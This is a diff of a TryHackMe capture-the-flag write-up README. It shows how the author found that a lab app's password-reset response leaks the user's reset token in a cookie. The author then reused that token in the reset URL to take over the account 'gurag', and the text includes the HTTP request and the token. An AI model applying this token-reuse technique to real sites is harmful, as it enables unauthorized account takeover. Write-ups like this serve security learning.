zinzloun/THM_WriteUP/README.md

     An email has been sent to the email associated with your username

 So the user exists.
 But I don't have access to the token of course.
 I decided to inspect the flow using Burp.
 Inspecting the reset request I found that the user token is also returned as cookie:

--->
+    Request -->

     GET /password_reset.php?user=gurag&user_token= HTTP/1.1
     ...

-<--
+    <-- Response

     HTTP/1.1 200 OK
     ...
     Set-Cookie: user_token=934e02cb6c5c6f5d345b55bedb26940c42a7f17ffa119d400ba154ea3ec0b69d860002b8053f27513b6b5440a0a7d5d52dfb

-Actually this thing it's not so strange, sometime during the development of an application such type of things could be present in order to test an app.
-Anyway, let's try to append the cookie value to the QS parameter:
+Actually this thing it's not so strange, sometime during the development of an application such type of things could be implemented in order to test authentication and authorization workflow.
+Anyway, let's try to append the cookie value to the query string parameter:

     http://10.200.95.31/password_reset.php?user=gurag&user_token=934e02cb6c5c6f5d345b55bedb26940c42a7f17ffa119d400ba154ea3ec0b69d860002b8053f27513b6b5440a0a7d5d52dfb